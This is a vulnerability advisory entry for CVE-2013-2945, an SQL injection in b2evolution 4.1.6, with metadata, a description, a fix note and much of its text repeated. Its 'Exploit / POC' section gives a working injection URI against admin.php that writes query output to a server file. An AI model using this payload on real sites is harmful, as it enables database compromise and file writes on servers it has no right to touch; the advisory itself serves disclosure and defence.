b2evolution CVE-2013-2945 SQL Injection Vulnerability
BID:59599
Info
b2evolution CVE-2013-2945 SQL Injection Vulnerability
| Bugtraq ID: | 59599 |
| Class: | Input Validation Error |
| CVE: |
CVE-2013-2945 |
| Remote: | Yes |
| Local: | No |
| Published: | May 01 2013 12:00AM |
| Updated: | May 01 2013 12:00AM |
| Credit: | High-Tech Bridge SA |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
b2evolution CVE-2013-2945 SQL Injection Vulnerability
b2evolution is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
b2evolution 4.1.6 is vulnerable; prior versions may also be affected.
b2evolution is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
b2evolution 4.1.6 is vulnerable; prior versions may also be affected.
Exploit / POC
b2evolution CVE-2013-2945 SQL Injection Vulnerability
Attackers can exploit this issue using browser.
The following example URI is available:
http://www.example.com/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses[]=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --
Attackers can exploit this issue using browser.
The following example URI is available:
http://www.example.com/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses[]=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --
Solution / Fix
b2evolution CVE-2013-2945 SQL Injection Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
b2evolution CVE-2013-2945 SQL Injection Vulnerability
References:
References:
- b2evolution Home page (b2evolution)